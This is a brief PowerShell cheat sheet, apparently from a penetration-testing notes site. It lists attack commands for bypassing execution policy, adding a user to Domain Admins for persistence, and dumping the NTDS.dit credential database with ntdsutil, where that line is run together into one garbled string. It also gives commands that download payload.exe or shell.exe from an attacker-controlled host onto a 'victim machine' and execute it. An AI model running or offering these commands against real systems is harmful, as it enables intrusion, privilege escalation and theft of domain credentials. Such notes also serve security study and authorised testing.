☄️Powershell Commands Cheat Sheet

Execution Bypass

Set-ExecutionPolicy Unrestricted 
./file.ps1

Import-Module script.psm1
Invoke-FunctionThatIsIntheModule

iex(new-object system.net.webclient).downloadstring(“file:///C:\examplefile.ps1”)

Powershell.exe blocked

Use ‘not powershell’ https://github.com/Ben0xA/nps

Persistence

```
net user username "password" /ADD
```

net group "Domain Admins" %username% /DOMAIN /ADD

Gather NTDS.dit file

ntdsutilactivate instance ntdsifmcreate full C:\ntdsutilquitquit

Download Files in Victim Machine

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<Attacker IP>:8080/payload.exe','payload.exe')"

OR

powershell iwr -Uri http://<IP>:<Port> -OutFile shell.exe

# Executing the payload
Start-Process "payload.exe"

OR

.\shell.exe

PreviousMeterpreter Cheat Sheet NextCommand Injection Cheat Sheet

Last updated 6 months ago